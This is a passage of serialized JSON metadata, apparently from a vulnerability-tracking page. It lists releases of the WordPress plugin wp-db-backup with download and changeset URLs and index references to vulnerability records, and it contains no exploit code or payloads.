lug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":782,"download_url":783,"svn_tag_url":784,"released_at":38,"has_diff":54,"diff_files_changed":785,"diff_lines":38,"trac_diff_url":786,"vulnerabilities":787,"is_current":54},"2.1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.1.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.1.0&new_path=%2Fwp-db-backup%2Ftags%2F2.1.1",[788,789,790,791,792,793,794],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":796,"download_url":797,"svn_tag_url":798,"released_at":38,"has_diff":54,"diff_files_changed":799,"diff_lines":38,"trac_diff_url":800,"vulnerabilities":801,"is_current":54},"2.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.1.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.1.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.0.6&new_path=%2Fwp-db-backup%2Ftags%2F2.1.0",[802,803,804,805,806,807,808],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":810,"download_url":811,"svn_tag_url":812,"released_at":38,"has_diff":54,"diff_files_changed":813,"diff_lines":38,"trac_diff_url":814,"vulnerabilities":815,"is_current":54},"2.0.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.0.6.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.0.6\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.0.5&new_path=%2Fwp-db-backup%2Ftags%2F2.0.6",[816,817,818,819,820,821,822],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":824,"download_url":825,"svn_tag_url":826,"released_at":38,"has_diff":54,"diff_files_changed":827,"diff_lines":38,"trac_diff_url":828,"vulnerabilities":829,"is_current":54},"2.0.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.0.5.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.0.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.0.4&new_path=%2Fwp-db-backup%2Ftags%2F2.0.5",[830,831,832,833,834,835,836],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":838,"download_url":839,"svn_tag_url":840,"released_at":38,"has_diff":54,"diff_files_changed":841,"diff_lines":38,"trac_diff_url":842,"vulnerabilities":843,"is_current":54},"2.0.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.0.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.0.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.0.3&new_path=%2Fwp-db-backup%2Ftags%2F2.0.4",[844,845,846,847,848,849,850],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":852,"download_url":853,"svn_tag_url":854,"released_at":38,"has_diff":54,"diff_files_changed":855,"diff_lines":38,"trac_diff_url":856,"vulnerabilities":857,"is_current":54},"2.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.0.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.0.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.0.2&new_path=%2Fwp-db-backup%2Ftags%2F2.0.3",[858,859,860,861,862,863,864],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":866,"download_url":867,"svn_tag_url":868,"released_at":38,"has_diff":54,"diff_files_changed":869,"diff_lines":38,"trac_diff_url":870,"vulnerabilities":871,"is_current":54},"2.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.0.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.0.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.0&new_path=%2Fwp-db-backup%2Ftags%2F2.0.2",[872,873,874,875,876,877,878],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":880,"download_url":881,"svn_tag_url":882,"released_at":38,"has_diff":54,"diff_files_changed":883,"diff_lines":38,"trac_diff_url":884,"vulnerabilities":885,"is_current":54},"2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F1.4&new_path=%2Fwp-db-backup%2Ftags%2F2.0",[886,887,888,889,890,891,892],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":894,"download_url":895,"svn_tag_url":896,"released_at":38,"has_diff":54,"diff_files_changed":897,"diff_lines":38,"trac_diff_url":898,"vulnerabilities":899,"is_current":54},"1.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.1.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F1.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F1.3&new_path=%2Fwp-db-backup%2Ftags%2F1.4",[900,901,902,903,904,905,906],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":908,"download_url":909,"svn_tag_url":910,"released_at":38,"has_diff":54,"diff_files_changed":911,"diff_lines":38,"trac_diff_url":38,"vulnerabilities":912,"is_current":54},"1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.1.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F1.3\u002F",[],[913,914,915,916,917,918,919],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40}]